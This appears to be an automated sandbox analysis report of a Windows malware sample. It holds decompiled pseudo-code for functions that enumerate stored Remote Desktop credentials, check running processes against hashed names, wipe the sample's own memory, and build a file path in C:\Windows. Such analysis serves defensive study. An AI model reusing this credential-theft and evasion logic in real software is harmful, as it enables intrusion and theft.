                                                                                                                                                  0x04774cff
                                                                                                                                                  0x04774d01
                                                                                                                                                  0x04774d02
                                                                                                                                                  0x04774d0d
                                                                                                                                                  0x04774d11
                                                                                                                                                  0x04774d14
                                                                                                                                                  0x04774d16
                                                                                                                                                  0x04774d16
                                                                                                                                                  0x04774d19
                                                                                                                                                  0x04774d19
                                                                                                                                                  0x04774d1b
                                                                                                                                                  0x04774d1c
                                                                                                                                                  0x04774d24
                                                                                                                                                  0x04774d2b
                                                                                                                                                  0x04774d2e
                                                                                                                                                  0x04774d30
                                                                                                                                                  0x04774d32
                                                                                                                                                  0x04774d32
                                                                                                                                                  0x04774d35
                                                                                                                                                  0x04774d35
                                                                                                                                                  0x04774d37
                                                                                                                                                  0x04774d38
                                                                                                                                                  0x04774d3e
                                                                                                                                                  0x04774d40
                                                                                                                                                  0x04774d42
                                                                                                                                                  0x04774d49
                                                                                                                                                  0x04774d4d
                                                                                                                                                  0x04774d50
                                                                                                                                                  0x04774d52
                                                                                                                                                  0x04774d54
                                                                                                                                                  0x04774d54
                                                                                                                                                  0x04774d57
                                                                                                                                                  0x04774d57
                                                                                                                                                  0x04774d59
                                                                                                                                                  0x04774d5a
                                                                                                                                                  0x04774d5e
                                                                                                                                                  0x04774d63
                                                                                                                                                  0x04774d42
                                                                                                                                                  0x04774d67
                                                                                                                                                  0x04774d6f
                                                                                                                                                  0x04774d74
                                                                                                                                                  0x04774d7a
                                                                                                                                                  0x04774d7a
                                                                                                                                                  0x04774d7d
                                                                                                                                                  0x04774d82
                                                                                                                                                  0x04774d82
                                                                                                                                                  0x04774d8a
                                                                                                                                                  0x04774d8e
                                                                                                                                                  0x04774d91
                                                                                                                                                  0x04774d9c
                                                                                                                                                  0x04774da0
                                                                                                                                                  0x04774dab
                                                                                                                                                  0x04774daf
                                                                                                                                                  0x04774db6
                                                                                                                                                  0x04774db8
                                                                                                                                                  0x04774dbb
                                                                                                                                                  0x04774dbb
                                                                                                                                                  0x04774dbd
                                                                                                                                                  0x04774dbe
                                                                                                                                                  0x04774dc9
                                                                                                                                                  0x04774dcd
                                                                                                                                                  0x04774dd0
                                                                                                                                                  0x04774dd2
                                                                                                                                                  0x04774dd5
                                                                                                                                                  0x04774dd5
                                                                                                                                                  0x04774dd7
                                                                                                                                                  0x04774dd8
                                                                                                                                                  0x04774de0
                                                                                                                                                  0x04774de7
                                                                                                                                                  0x04774dea
                                                                                                                                                  0x04774dec
                                                                                                                                                  0x04774dee
                                                                                                                                                  0x04774df1
                                                                                                                                                  0x04774df1
                                                                                                                                                  0x04774df3
                                                                                                                                                  0x04774df4
                                                                                                                                                  0x04774dfa
                                                                                                                                                  0x04774dfc
                                                                                                                                                  0x04774dfe
                                                                                                                                                  0x04774e05
                                                                                                                                                  0x04774e09
                                                                                                                                                  0x04774e0c
                                                                                                                                                  0x04774e0e
                                                                                                                                                  0x04774e10
                                                                                                                                                  0x04774e13
                                                                                                                                                  0x04774e13
                                                                                                                                                  0x04774e15
                                                                                                                                                  0x04774e16
                                                                                                                                                  0x04774e1a
                                                                                                                                                  0x04774e1f
                                                                                                                                                  0x04774dfe
                                                                                                                                                  0x04774e23
                                                                                                                                                  0x04774e2b
                                                                                                                                                  0x04774e30
                                                                                                                                                  0x04774e36
                                                                                                                                                  0x04774e36
                                                                                                                                                  0x04774e39
                                                                                                                                                  0x04774e3e
                                                                                                                                                  0x04774e3e
                                                                                                                                                  0x04774e48
                                                                                                                                                  0x04774e4b
                                                                                                                                                  0x04774e4e
                                                                                                                                                  0x04774e52
                                                                                                                                                  0x04774e52
                                                                                                                                                  0x04774e5d

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,74CB4F20,74854DB0,00000000,?,00000000,00000000,00000000), ref: 04774C14
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04774C1B
                                                                                                                                                  • rand.MSVCRT ref: 04774CE6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcessrand
                                                                                                                                                  • String ID: 8
                                                                                                                                                  • API String ID: 1878709018-4194326291
                                                                                                                                                  • Opcode ID: f3dcace1a9cd2f6fe3947090778f41a6f3a596ac8b90ab7351778e2f323b0cfc
                                                                                                                                                  • Instruction ID: 3543a87a13e34ca7a8ff38c4046035d0480d4939a2f63673f5ab0b23c7ae2f7c
                                                                                                                                                  • Opcode Fuzzy Hash: f3dcace1a9cd2f6fe3947090778f41a6f3a596ac8b90ab7351778e2f323b0cfc
                                                                                                                                                  • Instruction Fuzzy Hash: 59B1E031A042669FCF168F6C88642F97FF1AF06318F6581D9E8C5EB352DA35E64AC740
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E0477923F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				long _t35;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                  				int _t44;
                                                                                                                                                  				void* _t47;
                                                                                                                                                  				long _t48;
                                                                                                                                                  				intOrPtr _t52;
                                                                                                                                                  
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				if( *0x4787b8c != 0) {
                                                                                                                                                  					L15:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t52 =  *0x4783984; // 0x2ff54d0
                                                                                                                                                  				if(_t52 == 0) {
                                                                                                                                                  					goto L15;
                                                                                                                                                  				}
                                                                                                                                                  				_t14 =  *0x4787b98;
                                                                                                                                                  				_t44 =  *( *((intOrPtr*)(_t14 + 0x3c)) + _t14 + 0x50);
                                                                                                                                                  				_t40 = _t14;
                                                                                                                                                  				_v8 = _t44;
                                                                                                                                                  				_t31 = VirtualAlloc(0, _t44, 0x1000, 4);
                                                                                                                                                  				if(_t31 == 0) {
                                                                                                                                                  					L14:
                                                                                                                                                  					goto L15;
                                                                                                                                                  				}
                                                                                                                                                  				 *0x4787bb4 = _t31;
                                                                                                                                                  				memcpy(_t31, _t40, _t44);
                                                                                                                                                  				_t42 =  *0x4783984; // 0x2ff54d0
                                                                                                                                                  				_t5 = _t42 + 0x3c; // 0xe8
                                                                                                                                                  				_t47 =  *_t5 + _t42;
                                                                                                                                                  				if(_t47 != 0) {
                                                                                                                                                  					_t21 =  *((intOrPtr*)(_t47 + 0xa0));
                                                                                                                                                  					if( *((intOrPtr*)(_t47 + 0xa0)) != 0 &&  *((intOrPtr*)(_t47 + 0xa4)) != 0) {
                                                                                                                                                  						_t22 = E04778FD1(_t47, _t21);
                                                                                                                                                  						_t23 = _t22 + _t42;
                                                                                                                                                  						if(_t22 + _t42 != 0 && E04778EA9(_t23, _t31) != 0 && E04778F35(_t47, _t31) != 0) {
                                                                                                                                                  							_push(0xffffffff);
                                                                                                                                                  							_push(_a12);
                                                                                                                                                  							_push(_a8);
                                                                                                                                                  							_push(_a4);
                                                                                                                                                  							 *((intOrPtr*)(E04779154 -  *0x4787b98 + _t31))();
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t48 = _v8;
                                                                                                                                                  				if(VirtualProtect(_t31, _t48, 4,  &_v12) == 0) {
                                                                                                                                                  					goto L14;
                                                                                                                                                  				}
                                                                                                                                                  				_t35 = _t48;
                                                                                                                                                  				_t19 = _t31;
                                                                                                                                                  				if(_t48 == 0) {
                                                                                                                                                  					L13:
                                                                                                                                                  					VirtualFree(_t31, _t48, 0x4000);
                                                                                                                                                  					goto L14;
                                                                                                                                                  				} else {
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  				do {
                                                                                                                                                  					L12:
                                                                                                                                                  					 *_t19 = 0;
                                                                                                                                                  					_t19 = _t19 + 1;
                                                                                                                                                  					_t35 = _t35 - 1;
                                                                                                                                                  				} while (_t35 != 0);
                                                                                                                                                  				goto L13;
                                                                                                                                                  			}

















                                                                                                                                                  0x04779242
                                                                                                                                                  0x04779243
                                                                                                                                                  0x0477924c
                                                                                                                                                  0x0477932c
                                                                                                                                                  0x0477932f
                                                                                                                                                  0x0477932f
                                                                                                                                                  0x04779252
                                                                                                                                                  0x04779258
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477925e
                                                                                                                                                  0x04779268
                                                                                                                                                  0x04779276
                                                                                                                                                  0x04779278
                                                                                                                                                  0x04779281
                                                                                                                                                  0x04779285
                                                                                                                                                  0x04779329
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477932b
                                                                                                                                                  0x0477928e
                                                                                                                                                  0x04779294
                                                                                                                                                  0x04779299
                                                                                                                                                  0x0477929f
                                                                                                                                                  0x047792a5
                                                                                                                                                  0x047792a7
                                                                                                                                                  0x047792a9
                                                                                                                                                  0x047792b1
                                                                                                                                                  0x047792bf
                                                                                                                                                  0x047792c4
                                                                                                                                                  0x047792c6
                                                                                                                                                  0x047792de
                                                                                                                                                  0x047792e0
                                                                                                                                                  0x047792e8
                                                                                                                                                  0x047792f1
                                                                                                                                                  0x047792f6
                                                                                                                                                  0x047792f6
                                                                                                                                                  0x047792c6
                                                                                                                                                  0x047792b1
                                                                                                                                                  0x047792f8
                                                                                                                                                  0x0477930b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477930d
                                                                                                                                                  0x0477930f
                                                                                                                                                  0x04779313
                                                                                                                                                  0x0477931c
                                                                                                                                                  0x04779323
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779315
                                                                                                                                                  0x04779315
                                                                                                                                                  0x04779315
                                                                                                                                                  0x04779318
                                                                                                                                                  0x04779319
                                                                                                                                                  0x04779319
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,047779FC,?,?,?), ref: 0477927B
                                                                                                                                                  • memcpy.MSVCRT ref: 04779294
                                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04779303
                                                                                                                                                  • VirtualFree.KERNEL32(00000000,?,00004000), ref: 04779323
                                                                                                                                                    • Part of subcall function 04778F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 04778F52
                                                                                                                                                    • Part of subcall function 04778F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,02FF54D0), ref: 04778FB0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$Protect$AllocFreememcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2644210-0
                                                                                                                                                  • Opcode ID: db47678b0d8a4ae600c16c778a145361922d39e36e6444da0aef427c8f0306f5
                                                                                                                                                  • Instruction ID: 9d0dd72d2ac68d4a9614a8f95ff90bbad86b68b68f9c4648d5d3ca654c9425e2
                                                                                                                                                  • Opcode Fuzzy Hash: db47678b0d8a4ae600c16c778a145361922d39e36e6444da0aef427c8f0306f5
                                                                                                                                                  • Instruction Fuzzy Hash: 7E21B5F1601601ABFF249B699D88FDBBB99EF44755F94412CBB16E3390EA74E8008660
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                  			E0477855F() {
                                                                                                                                                  				char _v524;
                                                                                                                                                  				void* _v560;
                                                                                                                                                  				int _t8;
                                                                                                                                                  				void* _t10;
                                                                                                                                                  				signed int _t13;
                                                                                                                                                  				signed int _t14;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  
                                                                                                                                                  				_t14 = _t13 | 0xffffffff;
                                                                                                                                                  				_t15 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                  				if(_t15 != _t14) {
                                                                                                                                                  					_push( &_v560);
                                                                                                                                                  					_v560 = 0x22c;
                                                                                                                                                  					_t8 = Process32FirstW(_t15);
                                                                                                                                                  					while(_t8 != 0) {
                                                                                                                                                  						_t10 = E047782EE( &_v524);
                                                                                                                                                  						if(_t10 == 0x4a241c3e) {
                                                                                                                                                  							L10:
                                                                                                                                                  							_t14 = _t14 & 0xffffffef;
                                                                                                                                                  						} else {
                                                                                                                                                  							if(_t10 == 0x923ca517) {
                                                                                                                                                  								L9:
                                                                                                                                                  								_t14 = _t14 & 0xffffffbf;
                                                                                                                                                  							} else {
                                                                                                                                                  								if(_t10 == 0x966d0415 || _t10 == 0xaa331620) {
                                                                                                                                                  									goto L10;
                                                                                                                                                  								} else {
                                                                                                                                                  									if(_t10 == 0xc8f10976) {
                                                                                                                                                  										goto L9;
                                                                                                                                                  									} else {
                                                                                                                                                  										if(_t10 == 0xe2517a14) {
                                                                                                                                                  											goto L10;
                                                                                                                                                  										} else {
                                                                                                                                                  											if(_t10 == 0xe5a05a00) {
                                                                                                                                                  												goto L9;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t8 = Process32NextW(_t15,  &_v560);
                                                                                                                                                  					}
                                                                                                                                                  					CloseHandle(_t15);
                                                                                                                                                  				}
                                                                                                                                                  				return _t14;
                                                                                                                                                  			}










                                                                                                                                                  0x0477856e
                                                                                                                                                  0x04778577
                                                                                                                                                  0x0477857b
                                                                                                                                                  0x04778583
                                                                                                                                                  0x04778585
                                                                                                                                                  0x0477858f
                                                                                                                                                  0x047785ea
                                                                                                                                                  0x0477859e
                                                                                                                                                  0x047785a8
                                                                                                                                                  0x047785d9
                                                                                                                                                  0x047785d9
                                                                                                                                                  0x047785aa
                                                                                                                                                  0x047785af
                                                                                                                                                  0x047785d4
                                                                                                                                                  0x047785d4
                                                                                                                                                  0x047785b1
                                                                                                                                                  0x047785b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047785bf
                                                                                                                                                  0x047785c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047785c6
                                                                                                                                                  0x047785cb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047785cd
                                                                                                                                                  0x047785d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047785d2
                                                                                                                                                  0x047785cb
                                                                                                                                                  0x047785c4
                                                                                                                                                  0x047785b6
                                                                                                                                                  0x047785af
                                                                                                                                                  0x047785e4
                                                                                                                                                  0x047785e4
                                                                                                                                                  0x047785ef
                                                                                                                                                  0x047785ef
                                                                                                                                                  0x047785fa

                                                                                                                                                  APIs
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04778571
                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0477858F
                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 047785E4
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 047785EF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                  • Opcode ID: aa06cd209304d938056a7c78f4b1d25b7ea96b9e5cfd5513337c99aae60d870b
                                                                                                                                                  • Instruction ID: e233c8fdcf52a9fa5e04a5420ab50ab9bb9206f27da06a9c3df11b69c991eb31
                                                                                                                                                  • Opcode Fuzzy Hash: aa06cd209304d938056a7c78f4b1d25b7ea96b9e5cfd5513337c99aae60d870b
                                                                                                                                                  • Instruction Fuzzy Hash: 8301F962501214AADF3079A9DC8CBAF77588B49370FD60752ED22F22D0EA24A9904A73
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                                  			E047776F2(intOrPtr _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				char* _t30;
                                                                                                                                                  				signed int _t32;
                                                                                                                                                  				intOrPtr _t33;
                                                                                                                                                  				signed int _t38;
                                                                                                                                                  				signed short* _t41;
                                                                                                                                                  				void* _t44;
                                                                                                                                                  				char* _t45;
                                                                                                                                                  				signed short* _t49;
                                                                                                                                                  
                                                                                                                                                  				_t38 = 0;
                                                                                                                                                  				_t30 =  &_v8;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				__imp__CredEnumerateW(0, 0, _t30,  &_v12);
                                                                                                                                                  				_v24 = _t30;
                                                                                                                                                  				if(_t30 == 0) {
                                                                                                                                                  					L19:
                                                                                                                                                  					return _v24;
                                                                                                                                                  				}
                                                                                                                                                  				_t32 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				if(_v8 <= 0) {
                                                                                                                                                  					L18:
                                                                                                                                                  					__imp__CredFree(_v12);
                                                                                                                                                  					goto L19;
                                                                                                                                                  				}
                                                                                                                                                  				do {
                                                                                                                                                  					_t33 =  *((intOrPtr*)(_v12 + _t32 * 4));
                                                                                                                                                  					_t49 =  *(_t33 + 8);
                                                                                                                                                  					if(_t49 == _t38) {
                                                                                                                                                  						L14:
                                                                                                                                                  						if( *((intOrPtr*)(_t33 + 4)) != 2) {
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						L15:
                                                                                                                                                  						E04776B95(_t49, 0, _a4);
                                                                                                                                                  						goto L16;
                                                                                                                                                  					}
                                                                                                                                                  					_v16 = 8;
                                                                                                                                                  					_t45 = L"TERMSRV/";
                                                                                                                                                  					_t41 = _t49;
                                                                                                                                                  					while( *_t41 ==  *_t45) {
                                                                                                                                                  						_t41 =  &(_t41[1]);
                                                                                                                                                  						_t45 =  &(_t45[2]);
                                                                                                                                                  						_t13 =  &_v16;
                                                                                                                                                  						 *_t13 = _v16 - 1;
                                                                                                                                                  						if( *_t13 != 0) {
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						_t38 = 0;
                                                                                                                                                  						_t44 = 0;
                                                                                                                                                  						L8:
                                                                                                                                                  						if((0 | _t44 == _t38) == _t38) {
                                                                                                                                                  							goto L14;
                                                                                                                                                  						}
                                                                                                                                                  						_t49 =  &(_t49[8]);
                                                                                                                                                  						if( *((intOrPtr*)(_t33 + 4)) != 1) {
                                                                                                                                                  							goto L14;
                                                                                                                                                  						}
                                                                                                                                                  						if( *((intOrPtr*)(_t33 + 0x30)) != _t38 &&  *((intOrPtr*)(_t33 + 0x1c)) != _t38) {
                                                                                                                                                  							E047769AE( *((intOrPtr*)(_t33 + 0x30)),  *((intOrPtr*)(_t33 + 0x1c)), _t38);
                                                                                                                                                  						}
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					asm("sbb ecx, ecx");
                                                                                                                                                  					_t44 = ( *_t41 & 0xfffe) + 1;
                                                                                                                                                  					_t38 = 0;
                                                                                                                                                  					goto L8;
                                                                                                                                                  					L16:
                                                                                                                                                  					_t32 = _v20 + 1;
                                                                                                                                                  					_v20 = _t32;
                                                                                                                                                  				} while (_t32 < _v8);
                                                                                                                                                  				goto L18;
                                                                                                                                                  			}

















                                                                                                                                                  0x047776fd
                                                                                                                                                  0x047776ff
                                                                                                                                                  0x04777705
                                                                                                                                                  0x04777708
                                                                                                                                                  0x0477770b
                                                                                                                                                  0x04777711
                                                                                                                                                  0x04777716
                                                                                                                                                  0x047777c9
                                                                                                                                                  0x047777ce
                                                                                                                                                  0x047777ce
                                                                                                                                                  0x0477771c
                                                                                                                                                  0x0477771e
                                                                                                                                                  0x04777724
                                                                                                                                                  0x047777c0
                                                                                                                                                  0x047777c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047777c3
                                                                                                                                                  0x0477772c
                                                                                                                                                  0x04777732
                                                                                                                                                  0x04777734
                                                                                                                                                  0x04777739
                                                                                                                                                  0x0477779c
                                                                                                                                                  0x047777a0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047777a2
                                                                                                                                                  0x047777a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047777a9
                                                                                                                                                  0x0477773b
                                                                                                                                                  0x04777742
                                                                                                                                                  0x04777747
                                                                                                                                                  0x04777749
                                                                                                                                                  0x04777751
                                                                                                                                                  0x04777754
                                                                                                                                                  0x04777757
                                                                                                                                                  0x04777757
                                                                                                                                                  0x0477775a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477775c
                                                                                                                                                  0x0477775e
                                                                                                                                                  0x04777760
                                                                                                                                                  0x04777769
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477776b
                                                                                                                                                  0x04777772
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777777
                                                                                                                                                  0x04777785
                                                                                                                                                  0x04777785
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777777
                                                                                                                                                  0x04777792
                                                                                                                                                  0x04777797
                                                                                                                                                  0x04777798
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047777ae
                                                                                                                                                  0x047777b1
                                                                                                                                                  0x047777b2
                                                                                                                                                  0x047777b5
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 0477770B
                                                                                                                                                  • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 047777C3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Cred$EnumerateFree
                                                                                                                                                  • String ID: TERMSRV/
                                                                                                                                                  • API String ID: 3403564193-3001602198
                                                                                                                                                  • Opcode ID: 9383cf7eaa0f361839b2f8695fe88b204be41e927b11006cd917e7972cdd9fb4
                                                                                                                                                  • Instruction ID: 2b9f09ce4c46d091fcf17b7d70cf2bd0a9e3731bd20afab4bc341798ab5945bb
                                                                                                                                                  • Opcode Fuzzy Hash: 9383cf7eaa0f361839b2f8695fe88b204be41e927b11006cd917e7972cdd9fb4
                                                                                                                                                  • Instruction Fuzzy Hash: D2212B72A00205DFDF189FA9C9C48AEB7BAFF45314B9584BAD102A7211D770B985DB90
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E04779332(void* __eax, CHAR* _a4) {
                                                                                                                                                  				void* _t16;
                                                                                                                                                  
                                                                                                                                                  				_t16 = 0;
                                                                                                                                                  				__imp__#52(_a4);
                                                                                                                                                  				if(__eax != 0) {
                                                                                                                                                  					wsprintfA(_a4, "%u.%u.%u.%u",  *( *( *(__eax + 0xc))) & 0x000000ff, ( *( *(__eax + 0xc)))[1] & 0x000000ff,  *(_t10 + 2) & 0x000000ff,  *(_t10 + 3) & 0x000000ff);
                                                                                                                                                  					_t16 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _t16;
                                                                                                                                                  			}




                                                                                                                                                  0x04779339
                                                                                                                                                  0x0477933b
                                                                                                                                                  0x04779343
                                                                                                                                                  0x04779365
                                                                                                                                                  0x0477936e
                                                                                                                                                  0x0477936e
                                                                                                                                                  0x04779373

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: gethostbynamewsprintf
                                                                                                                                                  • String ID: %u.%u.%u.%u
                                                                                                                                                  • API String ID: 3411498959-1542503432
                                                                                                                                                  • Opcode ID: a083da4217f4cee14c50df5a2566d4362c0b8bda12e998ab1c99c97afd2b091d
                                                                                                                                                  • Instruction ID: 4989ebc93d5fa823fcfefe517c323ff98228068d0a2f7f29e96eb50aab6cdae2
                                                                                                                                                  • Opcode Fuzzy Hash: a083da4217f4cee14c50df5a2566d4362c0b8bda12e998ab1c99c97afd2b091d
                                                                                                                                                  • Instruction Fuzzy Hash: 45E02BB12040A02F83151B59DC1CC72BFECDF092523498195FA85CB132C528DA21DBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04777E69(WCHAR* _a4) {
                                                                                                                                                  				void* _t4;
                                                                                                                                                  
                                                                                                                                                  				_t4 = 0;
                                                                                                                                                  				if(PathCombineW(_a4, L"C:\\Windows\\", L"cscc.dat") != 0) {
                                                                                                                                                  					_t4 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				return _t4;
                                                                                                                                                  			}




                                                                                                                                                  0x04777e7a
                                                                                                                                                  0x04777e84
                                                                                                                                                  0x04777e86
                                                                                                                                                  0x04777e86
                                                                                                                                                  0x04777e8b

                                                                                                                                                  APIs
                                                                                                                                                  • PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04777EA6,?), ref: 04777E7C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
